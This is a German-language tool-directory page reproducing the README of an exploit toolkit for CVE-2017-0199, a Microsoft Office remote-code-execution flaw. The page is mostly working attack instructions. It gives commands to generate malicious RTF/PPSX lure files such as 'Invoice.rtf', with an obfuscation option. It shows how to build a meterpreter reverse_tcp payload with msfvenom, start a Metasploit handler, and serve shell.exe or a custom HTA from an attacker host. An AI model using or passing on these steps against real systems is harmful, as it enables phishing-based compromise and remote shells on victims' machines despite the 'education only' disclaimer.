Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-0199 | Kitploit
Tools/GitHubGitHub/likekabin/cve-2017-0199
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHublikekabin/cve-2017-0199

CVE-2017-0199

Repository anzeigen
vor 8 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Exploit-Toolkit CVE-2017-0199 - v4.0

Exploit-Toolkit CVE-2017-0199 - v4.0 ist ein praktisches Python-Skript, das Pentestern und Sicherheitsforschern eine schnelle und effektive Möglichkeit bietet, Microsoft Office RCE zu testen. Es kann eine bösartige RTF/PPSX-Datei erzeugen und metasploit / meterpreter / andere Payloads ohne komplexe Konfiguration an das Opfer ausliefern.

Disclaimer

Dieses Programm dient NUR Bildungszwecken. Verwenden Sie es nicht ohne Erlaubnis. Es gilt der übliche Haftungsausschluss, insbesondere die Tatsache, dass ich (bhdresh) nicht für Schäden haftbar bin, die durch direkte oder indirekte Nutzung der von diesen Programmen bereitgestellten Informationen oder Funktionen verursacht werden. Der Autor oder ein Internetanbieter übernimmt KEINE Verantwortung für den Inhalt oder Missbrauch dieser Programme oder deren Derivaten. Durch die Nutzung dieses Programms akzeptieren Sie die Tatsache, dass Schäden (Datenverlust, Systemabsturz, Systemkompromittierung usw.), die durch die Verwendung dieser Programme verursacht werden, nicht in der Verantwortung von bhdresh liegen.

Schließlich ist dies eine persönliche Entwicklung, bitte respektieren Sie ihre Philosophie und nutzen Sie sie nicht für schlechte Dinge!

Lizenz

CC BY 4.0-Lizenz - https://creativecommons.org/licenses/by/4.0/

Versionshinweis:

Die folgenden Funktionen wurden in das Skript aufgenommen:

root@kitploit:~
- Bösartige PPSX-Datei generieren
- Exploit-Modus für generierte PPSX-Datei
- Vorlage template.ppsx aktualisiert

Version: Python-Version 2.7.13

Szenario 1: Lokale Payload ausliefern

Beispielbefehle
root@kitploit:~
1) Bösartige RTF-Datei generieren
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) (Optional, falls MSF-Payload verwendet wird): Metasploit-Payload generieren und Handler starten
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Toolkit im Exploit-Modus starten, um lokale Payload auszuliefern
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
Sequenzdiagramm

alt tag

Szenario 2: Remote-Payload ausliefern

Beispielbefehle
root@kitploit:~
1) Bösartige RTF-Datei generieren
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) Toolkit im Exploit-Modus starten, um Remote-Payload auszuliefern
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe
Sequenzdiagramm

alt tag

Szenario 3: Benutzerdefinierte HTA-Datei ausliefern

Beispielbefehle
root@kitploit:~
1) Bösartige RTF-Datei generieren
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Toolkit im Exploit-Modus starten, um eine benutzerdefinierte HTA-Datei auszuliefern
   # python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta
Sequenzdiagramm

alt tag

Befehlszeilenargumente:

root@kitploit:~
# python cve-2017-0199_toolkit.py -h

Dies ist ein praktisches Toolkit zum Ausnutzen von CVE-2017-0199 (Microsoft Office RCE)

Modi:

-M gen                                          Generiert nur eine bösartige Datei

     Bösartige RTF/PPSX-Datei generieren:

      -w <Filename.rtf/Filename.ppsx>     Name der bösartigen RTF/PPSX-Datei (Teilen Sie diese Datei mit dem Opfer).

      -u <http://attacker.com/test.hta>   Der Pfad zu einer HTA/SCT-Datei. Normalerweise sollte dies eine Domain oder IP sein, auf der dieses Toolkit ausgeführt wird.
      Zum Beispiel http://attackerip.com/test.doc (Diese URL wird in die bösartige RTF/PPSX-Datei aufgenommen und abgerufen, sobald das Opfer die bösartige RTF-Datei öffnet.
      -t RTF|PPSX (default = RTF)         Typ der zu generierenden Datei.
      -x 0|1  (default = 0)               Verschleierte RTF-Datei generieren. 0 = Deaktivieren, 1 = Aktivieren.

				      
-M exp                                          Exploit-Modus starten

     Ausnutzung:
 
      -t RTF|PPSX (default = RTF)         Typ der auszunutzenden Datei.
      -H </tmp/custom>                Lokaler Pfad einer benutzerdefinierten HTA/SCT-Datei, die auf dem Ziel ausgeliefert und ausgeführt werden soll.
                                          HINWEIS: Diese Option liefert keine Payloads aus, die über die Optionen "-e" und "-l" angegeben wurden.
					  
      -p <TCP port:Default 80>            Lokale Portnummer.

      -e <http://attacker.com/shell.exe>  Der Pfad einer ausführbaren Datei / Meterpreter-Shell / eines Payloads, der auf dem Ziel ausgeführt werden soll.

      -l </tmp/shell.exe>                 Wenn das Payload lokal gehostet wird, geben Sie den lokalen Pfad einer ausführbaren Datei / Meterpreter-Shell / eines Payloads an.

Danksagung

@nixawk für das RTF-Beispiel, @Li Haifei, @bhdresh

Fehler, Probleme, Feature-Anfragen

Offensichtlich bin ich kein Vollzeit-Entwickler, also seien Sie auf kleinere Probleme gefasst.

Bitte melden Sie Fehler und Probleme über https://github.com/bhdresh/CVE-2017-0199/issues/new

Tool herunterladen